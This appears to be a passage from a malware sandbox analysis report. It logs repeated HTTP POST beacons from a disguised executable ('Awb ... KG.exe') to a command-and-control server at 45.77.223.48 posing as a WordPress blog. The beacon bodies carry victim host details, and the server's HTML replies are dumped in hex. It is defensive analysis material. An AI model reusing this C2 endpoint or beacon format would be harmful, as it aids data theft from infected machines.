                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:32.072443962 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.44977645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:32.329145908 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:32.456109047 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:33.266455889 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:32 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:33.266486883 CEST70INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
                                              Apr 25, 2024 09:42:33.266587973 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:33.273724079 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:33.274024010 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:33.274049044 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:33.274230003 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:33.274383068 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:33.274450064 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:33.274463892 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.44977745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:33.541898966 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:33.669126034 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:34.686326027 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:33 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:34.686347961 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:34.686506987 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:34.686671972 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:34.686780930 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:34.704169035 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:34.707104921 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:34.707180023 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:34.707405090 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:34.708142042 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.44977845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:34.955343008 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:35.082542896 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:35.915126085 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:35 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:35.915240049 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:35.915329933 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:35.924458027 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:35.924885988 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:35.925029993 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:35.925163031 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:35.925343990 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:35.925357103 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:35.925466061 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.44977945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:36.181911945 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:36.307461977 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:37.140893936 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:36 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:37.141244888 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:37.141258001 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:37.150084972 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:37.150435925 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:37.150487900 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:37.150552034 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:37.150868893 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:37.150924921 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:37.150938034 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.44978045.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:37.405097961 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:37.536058903 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:38.365076065 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:37 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:38.365109921 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:38.365163088 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:38.365220070 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:38.365544081 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:38.374820948 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:38.375261068 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:38.375334978 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:38.375531912 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
